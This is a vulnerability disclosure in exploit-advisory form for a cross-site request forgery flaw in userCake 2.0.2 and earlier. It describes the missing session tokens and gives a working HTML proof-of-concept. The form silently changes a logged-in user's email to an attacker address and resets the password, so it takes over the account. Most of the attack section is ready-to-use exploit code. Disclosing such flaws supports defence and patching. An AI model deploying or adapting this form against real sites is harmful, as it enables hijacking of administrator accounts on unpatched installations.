# Exploit Title: Cross-Site Request Forgery vulnerability # Software: userCake # Software Link: http://usercake.com/downloads/userCakeV2.0.2.zip # Version: <=2.0.2 # Author: Dolev Farhi; dolev(at)openflare(dot)org # Date: 24.5.2014 # Tested on: Kali Linux # Vendor homepage: usercake.com # Vendor alert date: 23.5.2014 1. About the application: Usercake's goal is to provide a secure user management system which can easily be adapted to any project's needs. It is cleanly written, well documented and easily modified. It comes with a strong backbone of tools and functions necessary for user management and has an active community of developers and enthusiasts able to provide support for your project. 2. Vulnerability Description: userCake lacks session tokens making it vulnerable to cross-site request forgery attacks (CSRF). an attacker can easily change administrator password and email. 3. Exploit / Proof of concept <html> <! -- CSRF Example for userCake --> <div align="center"> <pre> <h2><b> userCake CSRF Proof of concept <b></h2> <h4> Prerequisite: Make sure the user is logged in to the forum before submitting </h4> <body> <form action="http://usercake.com/user_settings.php" method="POST"> Enter <u>CSRFTest</u> user account password to continue... Username: <b>CSRFTest</b> Password: <input type="password" name="password" size="10" required> <input type="hidden" name="email" value="attacker@email.com" /> <input type="hidden" name="passwordc" value="HelloWorld" /> <input type="hidden" name="passwordcheck" value="HelloWorld" /> <input type="submit" name="submit" value="Submit" /> </form> </body> </div> </html>